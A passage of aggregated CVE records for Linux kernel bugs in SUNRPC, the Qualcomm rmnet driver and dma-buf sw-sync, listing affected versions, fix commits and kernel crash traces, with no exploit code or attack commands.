"url": "https://git.kernel.org/stable/c/8f860c8407470baff2beb9982ad6b172c94f1d0a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/31b62908693c90d4d07db597e685d9f25a120073"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/sunrpc/xprtmultipath.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "fece80a2a6718ed58487ce397285bb1b83a3e54e",
"status": "affected",
"version": "39e5d2df959dd4aea81fa33d765d2a5cc67a0512",
"versionType": "git"
},
{
"lessThan": "7a96d85bf196c170dcf1b47a82e9bb97cca69aa6",
"status": "affected",
"version": "39e5d2df959dd4aea81fa33d765d2a5cc67a0512",
"versionType": "git"
},
{
"lessThan": "c430e6bb43955c6bf573665fcebf31694925b9f7",
"status": "affected",
"version": "39e5d2df959dd4aea81fa33d765d2a5cc67a0512",
"versionType": "git"
},
{
"lessThan": "f8cf4dabbdcb8bef85335b0ed7ad5b25fd82ff56",
"status": "affected",
"version": "39e5d2df959dd4aea81fa33d765d2a5cc67a0512",
"versionType": "git"
},
{
"lessThan": "e8ca3e73301e23e8c0ac0ce2e6bac4545cd776e0",
"status": "affected",
"version": "39e5d2df959dd4aea81fa33d765d2a5cc67a0512",
"versionType": "git"
},
{
"lessThan": "69c7eeb4f622c2a28da965f970f982db171f3dc6",
"status": "affected",
"version": "39e5d2df959dd4aea81fa33d765d2a5cc67a0512",
"versionType": "git"
},
{
"lessThan": "8f860c8407470baff2beb9982ad6b172c94f1d0a",
"status": "affected",
"version": "39e5d2df959dd4aea81fa33d765d2a5cc67a0512",
"versionType": "git"
},
{
"lessThan": "31b62908693c90d4d07db597e685d9f25a120073",
"status": "affected",
"version": "39e5d2df959dd4aea81fa33d765d2a5cc67a0512",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/sunrpc/xprtmultipath.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.9"
},
{
"lessThan": "4.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.77",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.16",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.77",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.16",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.4",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nSUNRPC: Fix a suspicious RCU usage warning\n\nI received the following warning while running cthon against an ontap\nserver running pNFS:\n\n[ 57.202521] =============================\n[ 57.202522] WARNING: suspicious RCU usage\n[ 57.202523] 6.7.0-rc3-g2cc14f52aeb7 #41492 Not tainted\n[ 57.202525] -----------------------------\n[ 57.202525] net/sunrpc/xprtmultipath.c:349 RCU-list traversed in non-reader section!!\n[ 57.202527]\n other info that might help us debug this:\n\n[ 57.202528]\n rcu_scheduler_active = 2, debug_locks = 1\n[ 57.202529] no locks held by test5/3567.\n[ 57.202530]\n stack backtrace:\n[ 57.202532] CPU: 0 PID: 3567 Comm: test5 Not tainted 6.7.0-rc3-g2cc14f52aeb7 #41492 5b09971b4965c0aceba19f3eea324a4a806e227e\n[ 57.202534] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS unknown 2/2/2022\n[ 57.202536] Call Trace:\n[ 57.202537] \u003cTASK\u003e\n[ 57.202540] dump_stack_lvl+0x77/0xb0\n[ 57.202551] lockdep_rcu_suspicious+0x154/0x1a0\n[ 57.202556] rpc_xprt_switch_has_addr+0x17c/0x190 [sunrpc ebe02571b9a8ceebf7d98e71675af20c19bdb1f6]\n[ 57.202596] rpc_clnt_setup_test_and_add_xprt+0x50/0x180 [sunrpc ebe02571b9a8ceebf7d98e71675af20c19bdb1f6]\n[ 57.202621] ? rpc_clnt_add_xprt+0x254/0x300 [sunrpc ebe02571b9a8ceebf7d98e71675af20c19bdb1f6]\n[ 57.202646] rpc_clnt_add_xprt+0x27a/0x300 [sunrpc ebe02571b9a8ceebf7d98e71675af20c19bdb1f6]\n[ 57.202671] ? __pfx_rpc_clnt_setup_test_and_add_xprt+0x10/0x10 [sunrpc ebe02571b9a8ceebf7d98e71675af20c19bdb1f6]\n[ 57.202696] nfs4_pnfs_ds_connect+0x345/0x760 [nfsv4 c716d88496ded0ea6d289bbea684fa996f9b57a9]\n[ 57.202728] ? __pfx_nfs4_test_session_trunk+0x10/0x10 [nfsv4 c716d88496ded0ea6d289bbea684fa996f9b57a9]\n[ 57.202754] nfs4_fl_prepare_ds+0x75/0xc0 [nfs_layout_nfsv41_files e3a4187f18ae8a27b630f9feae6831b584a9360a]\n[ 57.202760] filelayout_write_pagelist+0x4a/0x200 [nfs_layout_nfsv41_files e3a4187f18ae8a27b630f9feae6831b584a9360a]\n[ 57.202765] pnfs_generic_pg_writepages+0xbe/0x230 [nfsv4 c716d88496ded0ea6d289bbea684fa996f9b57a9]\n[ 57.202788] __nfs_pageio_add_request+0x3fd/0x520 [nfs 6c976fa593a7c2976f5a0aeb4965514a828e6902]\n[ 57.202813] nfs_pageio_add_request+0x18b/0x390 [nfs 6c976fa593a7c2976f5a0aeb4965514a828e6902]\n[ 57.202831] nfs_do_writepage+0x116/0x1e0 [nfs 6c976fa593a7c2976f5a0aeb4965514a828e6902]\n[ 57.202849] nfs_writepages_callback+0x13/0x30 [nfs 6c976fa593a7c2976f5a0aeb4965514a828e6902]\n[ 57.202866] write_cache_pages+0x265/0x450\n[ 57.202870] ? __pfx_nfs_writepages_callback+0x10/0x10 [nfs 6c976fa593a7c2976f5a0aeb4965514a828e6902]\n[ 57.202891] nfs_writepages+0x141/0x230 [nfs 6c976fa593a7c2976f5a0aeb4965514a828e6902]\n[ 57.202913] do_writepages+0xd2/0x230\n[ 57.202917] ? filemap_fdatawrite_wbc+0x5c/0x80\n[ 57.202921] filemap_fdatawrite_wbc+0x67/0x80\n[ 57.202924] filemap_write_and_wait_range+0xd9/0x170\n[ 57.202930] nfs_wb_all+0x49/0x180 [nfs 6c976fa593a7c2976f5a0aeb4965514a828e6902]\n[ 57.202947] nfs4_file_flush+0x72/0xb0 [nfsv4 c716d88496ded0ea6d289bbea684fa996f9b57a9]\n[ 57.202969] __se_sys_close+0x46/0xd0\n[ 57.202972] do_syscall_64+0x68/0x100\n[ 57.202975] ? do_syscall_64+0x77/0x100\n[ 57.202976] ? do_syscall_64+0x77/0x100\n[ 57.202979] entry_SYSCALL_64_after_hwframe+0x6e/0x76\n[ 57.202982] RIP: 0033:0x7fe2b12e4a94\n[ 57.202985] Code: 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e fa 80 3d d5 18 0e 00 00 74 13 b8 03 00 00 00 0f 05 \u003c48\u003e 3d 00 f0 ff ff 77 44 c3 0f 1f 00 48 83 ec 18 89 7c 24 0c e8 c3\n[ 57.202987] RSP: 002b:00007ffe857ddb38 EFLAGS: 00000202 ORIG_RAX: 0000000000000003\n[ 57.202989] RAX: ffffffffffffffda RBX: 00007ffe857dfd68 RCX: 00007fe2b12e4a94\n[ 57.202991] RDX: 0000000000002000 RSI: 00007ffe857ddc40 RDI: 0000000000000003\n[ 57.202992] RBP: 00007ffe857dfc50 R08: 7fffffffffffffff R09: 0000000065650f49\n[ 57.202993] R10: 00007f\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-21T08:49:49.945Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/fece80a2a6718ed58487ce397285bb1b83a3e54e"
},
{
"url": "https://git.kernel.org/stable/c/7a96d85bf196c170dcf1b47a82e9bb97cca69aa6"
},
{
"url": "https://git.kernel.org/stable/c/c430e6bb43955c6bf573665fcebf31694925b9f7"
},
{
"url": "https://git.kernel.org/stable/c/f8cf4dabbdcb8bef85335b0ed7ad5b25fd82ff56"
},
{
"url": "https://git.kernel.org/stable/c/e8ca3e73301e23e8c0ac0ce2e6bac4545cd776e0"
},
{
"url": "https://git.kernel.org/stable/c/69c7eeb4f622c2a28da965f970f982db171f3dc6"
},
{
"url": "https://git.kernel.org/stable/c/8f860c8407470baff2beb9982ad6b172c94f1d0a"
},
{
"url": "https://git.kernel.org/stable/c/31b62908693c90d4d07db597e685d9f25a120073"
}
],
"title": "SUNRPC: Fix a suspicious RCU usage warning",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52623",
"datePublished": "2024-03-26T17:19:24.425Z",
"dateReserved": "2024-03-06T09:52:12.090Z",
"dateUpdated": "2025-05-22T13:30:00.769Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26597 (GCVE-0-2024-26597)
Vulnerability from cvelistv5
Published
2024-02-23 14:46
Modified
2025-05-04 08:51
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: qualcomm: rmnet: fix global oob in rmnet_policy
The variable rmnet_link_ops assign a *bigger* maxtype which leads to a
global out-of-bounds read when parsing the netlink attributes. See bug
trace below:
==================================================================
BUG: KASAN: global-out-of-bounds in validate_nla lib/nlattr.c:386 [inline]
BUG: KASAN: global-out-of-bounds in __nla_validate_parse+0x24af/0x2750 lib/nlattr.c:600
Read of size 1 at addr ffffffff92c438d0 by task syz-executor.6/84207
CPU: 0 PID: 84207 Comm: syz-executor.6 Tainted: G N 6.1.0 #3
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014
Call Trace:
<TASK>
__dump_stack lib/dump_stack.c:88 [inline]
dump_stack_lvl+0x8b/0xb3 lib/dump_stack.c:106
print_address_description mm/kasan/report.c:284 [inline]
print_report+0x172/0x475 mm/kasan/report.c:395
kasan_report+0xbb/0x1c0 mm/kasan/report.c:495
validate_nla lib/nlattr.c:386 [inline]
__nla_validate_parse+0x24af/0x2750 lib/nlattr.c:600
__nla_parse+0x3e/0x50 lib/nlattr.c:697
nla_parse_nested_deprecated include/net/netlink.h:1248 [inline]
__rtnl_newlink+0x50a/0x1880 net/core/rtnetlink.c:3485
rtnl_newlink+0x64/0xa0 net/core/rtnetlink.c:3594
rtnetlink_rcv_msg+0x43c/0xd70 net/core/rtnetlink.c:6091
netlink_rcv_skb+0x14f/0x410 net/netlink/af_netlink.c:2540
netlink_unicast_kernel net/netlink/af_netlink.c:1319 [inline]
netlink_unicast+0x54e/0x800 net/netlink/af_netlink.c:1345
netlink_sendmsg+0x930/0xe50 net/netlink/af_netlink.c:1921
sock_sendmsg_nosec net/socket.c:714 [inline]
sock_sendmsg+0x154/0x190 net/socket.c:734
____sys_sendmsg+0x6df/0x840 net/socket.c:2482
___sys_sendmsg+0x110/0x1b0 net/socket.c:2536
__sys_sendmsg+0xf3/0x1c0 net/socket.c:2565
do_syscall_x64 arch/x86/entry/common.c:50 [inline]
do_syscall_64+0x3b/0x90 arch/x86/entry/common.c:80
entry_SYSCALL_64_after_hwframe+0x63/0xcd
RIP: 0033:0x7fdcf2072359
Code: 28 00 00 00 75 05 48 83 c4 28 c3 e8 f1 19 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007fdcf13e3168 EFLAGS: 00000246 ORIG_RAX: 000000000000002e
RAX: ffffffffffffffda RBX: 00007fdcf219ff80 RCX: 00007fdcf2072359
RDX: 0000000000000000 RSI: 0000000020000200 RDI: 0000000000000003
RBP: 00007fdcf20bd493 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000
R13: 00007fffbb8d7bdf R14: 00007fdcf13e3300 R15: 0000000000022000
</TASK>
The buggy address belongs to the variable:
rmnet_policy+0x30/0xe0
The buggy address belongs to the physical page:
page:0000000065bdeb3c refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x155243
flags: 0x200000000001000(reserved|node=0|zone=2)
raw: 0200000000001000 ffffea00055490c8 ffffea00055490c8 0000000000000000
raw: 0000000000000000 0000000000000000 00000001ffffffff 0000000000000000
page dumped because: kasan: bad access detected
Memory state around the buggy address:
ffffffff92c43780: f9 f9 f9 f9 00 00 00 02 f9 f9 f9 f9 00 00 00 07
ffffffff92c43800: f9 f9 f9 f9 00 00 00 05 f9 f9 f9 f9 06 f9 f9 f9
>ffffffff92c43880: f9 f9 f9 f9 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9
^
ffffffff92c43900: 00 00 00 00 00 00 00 00 07 f9 f9 f9 f9 f9 f9 f9
ffffffff92c43980: 00 00 00 07 f9 f9 f9 f9 00 00 00 05 f9 f9 f9 f9
According to the comment of `nla_parse_nested_deprecated`, the maxtype
should be len(destination array) - 1. Hence use `IFLA_RMNET_MAX` here.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 14452ca3b5ce304fb2fea96dbc9ca1e4e7978551 Version: 14452ca3b5ce304fb2fea96dbc9ca1e4e7978551 Version: 14452ca3b5ce304fb2fea96dbc9ca1e4e7978551 Version: 14452ca3b5ce304fb2fea96dbc9ca1e4e7978551 Version: 14452ca3b5ce304fb2fea96dbc9ca1e4e7978551 Version: 14452ca3b5ce304fb2fea96dbc9ca1e4e7978551 Version: 14452ca3b5ce304fb2fea96dbc9ca1e4e7978551 Version: 14452ca3b5ce304fb2fea96dbc9ca1e4e7978551 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26597",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-02-23T22:33:57.842147Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:49:32.262Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:07:19.733Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/093dab655808207f7a9f54cf156240aeafc70590"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/02467ab8b404d80429107588e0f3425cf5fcd2e5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2295c22348faf795e1ccdf618f6eb7afdb2f7447"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3b5254862258b595662a0ccca6e9eeb88d6e7468"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ee1dc3bf86f2df777038506b139371a9add02534"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c4734535034672f59f2652e1e0058c490da62a5c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/17d06a5c44d8fd2e8e61bac295b09153496f87e1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b33fb5b801c6db408b774a68e7c8722796b59ecc"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/qualcomm/rmnet/rmnet_config.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "093dab655808207f7a9f54cf156240aeafc70590",
"status": "affected",
"version": "14452ca3b5ce304fb2fea96dbc9ca1e4e7978551",
"versionType": "git"
},
{
"lessThan": "02467ab8b404d80429107588e0f3425cf5fcd2e5",
"status": "affected",
"version": "14452ca3b5ce304fb2fea96dbc9ca1e4e7978551",
"versionType": "git"
},
{
"lessThan": "2295c22348faf795e1ccdf618f6eb7afdb2f7447",
"status": "affected",
"version": "14452ca3b5ce304fb2fea96dbc9ca1e4e7978551",
"versionType": "git"
},
{
"lessThan": "3b5254862258b595662a0ccca6e9eeb88d6e7468",
"status": "affected",
"version": "14452ca3b5ce304fb2fea96dbc9ca1e4e7978551",
"versionType": "git"
},
{
"lessThan": "ee1dc3bf86f2df777038506b139371a9add02534",
"status": "affected",
"version": "14452ca3b5ce304fb2fea96dbc9ca1e4e7978551",
"versionType": "git"
},
{
"lessThan": "c4734535034672f59f2652e1e0058c490da62a5c",
"status": "affected",
"version": "14452ca3b5ce304fb2fea96dbc9ca1e4e7978551",
"versionType": "git"
},
{
"lessThan": "17d06a5c44d8fd2e8e61bac295b09153496f87e1",
"status": "affected",
"version": "14452ca3b5ce304fb2fea96dbc9ca1e4e7978551",
"versionType": "git"
},
{
"lessThan": "b33fb5b801c6db408b774a68e7c8722796b59ecc",
"status": "affected",
"version": "14452ca3b5ce304fb2fea96dbc9ca1e4e7978551",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/qualcomm/rmnet/rmnet_config.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.17"
},
{
"lessThan": "4.17",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.306",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.268",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.209",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.148",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.75",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.14",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.306",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.268",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.209",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.148",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.75",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.14",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.2",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: qualcomm: rmnet: fix global oob in rmnet_policy\n\nThe variable rmnet_link_ops assign a *bigger* maxtype which leads to a\nglobal out-of-bounds read when parsing the netlink attributes. See bug\ntrace below:\n\n==================================================================\nBUG: KASAN: global-out-of-bounds in validate_nla lib/nlattr.c:386 [inline]\nBUG: KASAN: global-out-of-bounds in __nla_validate_parse+0x24af/0x2750 lib/nlattr.c:600\nRead of size 1 at addr ffffffff92c438d0 by task syz-executor.6/84207\n\nCPU: 0 PID: 84207 Comm: syz-executor.6 Tainted: G N 6.1.0 #3\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014\nCall Trace:\n \u003cTASK\u003e\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0x8b/0xb3 lib/dump_stack.c:106\n print_address_description mm/kasan/report.c:284 [inline]\n print_report+0x172/0x475 mm/kasan/report.c:395\n kasan_report+0xbb/0x1c0 mm/kasan/report.c:495\n validate_nla lib/nlattr.c:386 [inline]\n __nla_validate_parse+0x24af/0x2750 lib/nlattr.c:600\n __nla_parse+0x3e/0x50 lib/nlattr.c:697\n nla_parse_nested_deprecated include/net/netlink.h:1248 [inline]\n __rtnl_newlink+0x50a/0x1880 net/core/rtnetlink.c:3485\n rtnl_newlink+0x64/0xa0 net/core/rtnetlink.c:3594\n rtnetlink_rcv_msg+0x43c/0xd70 net/core/rtnetlink.c:6091\n netlink_rcv_skb+0x14f/0x410 net/netlink/af_netlink.c:2540\n netlink_unicast_kernel net/netlink/af_netlink.c:1319 [inline]\n netlink_unicast+0x54e/0x800 net/netlink/af_netlink.c:1345\n netlink_sendmsg+0x930/0xe50 net/netlink/af_netlink.c:1921\n sock_sendmsg_nosec net/socket.c:714 [inline]\n sock_sendmsg+0x154/0x190 net/socket.c:734\n ____sys_sendmsg+0x6df/0x840 net/socket.c:2482\n ___sys_sendmsg+0x110/0x1b0 net/socket.c:2536\n __sys_sendmsg+0xf3/0x1c0 net/socket.c:2565\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x3b/0x90 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\nRIP: 0033:0x7fdcf2072359\nCode: 28 00 00 00 75 05 48 83 c4 28 c3 e8 f1 19 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48\nRSP: 002b:00007fdcf13e3168 EFLAGS: 00000246 ORIG_RAX: 000000000000002e\nRAX: ffffffffffffffda RBX: 00007fdcf219ff80 RCX: 00007fdcf2072359\nRDX: 0000000000000000 RSI: 0000000020000200 RDI: 0000000000000003\nRBP: 00007fdcf20bd493 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000\nR13: 00007fffbb8d7bdf R14: 00007fdcf13e3300 R15: 0000000000022000\n \u003c/TASK\u003e\n\nThe buggy address belongs to the variable:\n rmnet_policy+0x30/0xe0\n\nThe buggy address belongs to the physical page:\npage:0000000065bdeb3c refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x155243\nflags: 0x200000000001000(reserved|node=0|zone=2)\nraw: 0200000000001000 ffffea00055490c8 ffffea00055490c8 0000000000000000\nraw: 0000000000000000 0000000000000000 00000001ffffffff 0000000000000000\npage dumped because: kasan: bad access detected\n\nMemory state around the buggy address:\n ffffffff92c43780: f9 f9 f9 f9 00 00 00 02 f9 f9 f9 f9 00 00 00 07\n ffffffff92c43800: f9 f9 f9 f9 00 00 00 05 f9 f9 f9 f9 06 f9 f9 f9\n\u003effffffff92c43880: f9 f9 f9 f9 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9\n ^\n ffffffff92c43900: 00 00 00 00 00 00 00 00 07 f9 f9 f9 f9 f9 f9 f9\n ffffffff92c43980: 00 00 00 07 f9 f9 f9 f9 00 00 00 05 f9 f9 f9 f9\n\nAccording to the comment of `nla_parse_nested_deprecated`, the maxtype\nshould be len(destination array) - 1. Hence use `IFLA_RMNET_MAX` here."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:51:54.016Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/093dab655808207f7a9f54cf156240aeafc70590"
},
{
"url": "https://git.kernel.org/stable/c/02467ab8b404d80429107588e0f3425cf5fcd2e5"
},
{
"url": "https://git.kernel.org/stable/c/2295c22348faf795e1ccdf618f6eb7afdb2f7447"
},
{
"url": "https://git.kernel.org/stable/c/3b5254862258b595662a0ccca6e9eeb88d6e7468"
},
{
"url": "https://git.kernel.org/stable/c/ee1dc3bf86f2df777038506b139371a9add02534"
},
{
"url": "https://git.kernel.org/stable/c/c4734535034672f59f2652e1e0058c490da62a5c"
},
{
"url": "https://git.kernel.org/stable/c/17d06a5c44d8fd2e8e61bac295b09153496f87e1"
},
{
"url": "https://git.kernel.org/stable/c/b33fb5b801c6db408b774a68e7c8722796b59ecc"
}
],
"title": "net: qualcomm: rmnet: fix global oob in rmnet_policy",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26597",
"datePublished": "2024-02-23T14:46:26.042Z",
"dateReserved": "2024-02-19T14:20:24.127Z",
"dateUpdated": "2025-05-04T08:51:54.016Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-38780 (GCVE-0-2024-38780)
Vulnerability from cvelistv5
Published
2024-06-21 11:15
Modified
2025-11-04 17:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
dma-buf/sw-sync: don't enable IRQ from sync_print_obj()
Since commit a6aa8fca4d79 ("dma-buf/sw-sync: Reduce irqsave/irqrestore from
known context") by error replaced spin_unlock_irqrestore() with
spin_unlock_irq() for both sync_debugfs_show() and sync_print_obj() despite
sync_print_obj() is called from sync_debugfs_show(), lockdep complains
inconsistent lock state warning.
Use plain spin_{lock,unlock}() for sync_print_obj(), for
sync_debugfs_show() is already using spin_{lock,unlock}_irq().
References
| URL | Tags | |||||||||||||||||||||||||
